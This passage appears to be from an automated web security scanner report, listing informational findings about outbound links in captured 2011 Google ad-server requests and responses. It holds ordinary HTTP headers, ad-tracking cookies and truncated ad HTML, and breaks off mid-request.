Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1365

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.371. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9314328132562548&output=html&h=90&slotname=1448208227&w=728&lmt=1303690679&flash=10.2.154&url=http%3A%2F%2Fwww.fightidentitytheft.com%2Fcredit-monitoring.html&dt=1303674266988&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303674267047&frm=0&adk=3080309030&ga_vid=2066914421.1303674267&ga_sid=1303674267&ga_hid=1211426090&ga_fc=0&ga_wpids=UA-192617-1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=907&fu=0&ifi=1&dtd=81&xpc=Xfv9WHuQ2F&p=http%3A//www.fightidentitytheft.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:46:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14207

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0033cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.fightidentitytheft.com/credit-monitoring.html%26hl%3Den%26client%3Dca-pub-9314328132562548%26adU%3DFreeCreditScore.com/OfficialSite%26adT%3DFreeCreditScore.com%25E2%2584%25A2%26adU%3DFreeScore.com/Free-Credit-Scores%26adT%3D3%2BCredit%2BScores%2B(Free)%26adU%3Dwww.FreeCreditReport.com%26adT%3DFreeCreditReport.com%26gl%3DUS&amp;usg=AFQjCNFu4I9KNyVH79RgNCpvrot7ZbbavQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.372. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303684978&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fcontrolcasecom-contact%2Freflected-xss-cwe-79-ghdb-report-example-poc.html&dt=1303669567713&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303669567721&frm=0&adk=1607234649&ga_vid=861377575.1303669568&ga_sid=1303669568&ga_hid=1456136796&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&eid=33895212&fu=0&ifi=1&ea=0&dtd=150 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 18:25:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12516

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/controlcasecom-contact/reflected-xss-cwe-79-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.f5.com/load_balancing%26adT%3DLoad%2BBalancing%2B101%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.UAT.edu/ia%26adT%3DHacker%2BMasters%26gl%3DUS&amp;usg=AFQjCNE5dBJFgTIMJGVvtiY0PE6cKBK3Tg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.373. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681042&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663042924&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303663042936&frm=1&adk=2614322350&ga_vid=583695287.1303663043&ga_sid=1303663043&ga_hid=144936003&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:37:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1516

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/AVE/iview/286760735/direct;wi.160;hi.600/01/959332053?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB011KwFG0Tb1M0cyxB6OS7JILvubbjgL-nK2aHp6DpNRCsKBtEAEYASDZorcPOABQqbXiwf3_____AWDJ7oOI8KPsEqAB6s733AOyARdwdWIucmV0YWlsZXItYW1hem9uLm5ldLoBCjE2MHg2MDBfYXPIAQnaAUhodHRwOi8vcHViLnJldGFpbGVyLWFtYXpvbi5uZXQvYmFubmVyXzEyMF82MDBfYi5waHA_c2VhcmNoPSU3QiRrZXl3YTZkNGK4AhjAAgTIAo7mhh2oAwHRAx0TpncQM9aY6AO8AegDlAL1AwAAAMQ%26num%3D1%26sig%3DAGiWqtxFc0-9CNiWEeFs1Uz5OPj92BALYQ%26client%3Dca-pub-6888065668292638%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600"> <script language="JavaScript" type="text/javascript">
...[SNIP]...

23.374. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681706&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663706500&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663706508&frm=1&adk=2614322350&ga_vid=1403135793.1303663707&ga_sid=1303663707&ga_hid=2050470473&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:48:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DManage%2BBlade%2BServer%26adU%3Dwww.areasys.com%26adT%3DServers%2Bwith%2BIntel%2BXeon%26adU%3DNetApp.com/us%26adT%3DData%2BStorage%2Bfor%2BWindows%25C2%25AE%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26gl%3DUS&amp;usg=AFQjCNG8r1oV0MEk08y735pdz2v-fbze1Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.375. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1365

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.376. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2137

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdbayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.377. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25615591&ahcid=781458&bimpd=0DJCOea7tQaPEXcsrHCGvbJ50l01mKSguUhbpQoeH0RWhqpfXKSPD0-MFPpVBPU10m7tT2_9tEc5CKS7Skz1aq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BDkvQ6eUL3X8PfnSnaGsp-uk-XYrDlOOeRoBgVlRm5kMDlByLclETPpBR0VIG2dC6a9Q7FgriWjdrLAU7A9qPMdWscBjIiCiOms451jrCwDdtZPZ9Ju5iYKDVU3obChYLLzf464GptzhEx9p1rrX3KW3vX64t9pV4q8g0-D_Ww98PQ132Ppbuk7ijoUndfzz7rNfyLeQH5Gio5Do8v242vKJ6CYR718wQw9XuMOxHtEN8BBICX6F00yJ7PyUVTqmTQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-cyT1LhRsTuEogXW-yxzh0vfOgMJJgzaqMcTcfaNoC7PX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gYR-TIJOv7LUxnRCA3B1881InA3TgJhUy39fsTN9KR4PAbDv3_uGCXV0Te9AyFL5Xt_T370WDWWY1SqEwEJwbhn-ZNI0MTk2TjTf5ElUcAOcWpSmQvUNv3Xnc2JdM3M-BA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAMgAB9HgK5TqFIPdMcQuNKMEfW-AFpdRoCg&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.378. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634545&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616544945&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616545155&frm=0&adk=1607234649&ga_vid=445929804.1303616545&ga_sid=1303616545&ga_hid=1955879462&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=356&xpc=ph8hZ4Ud12&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
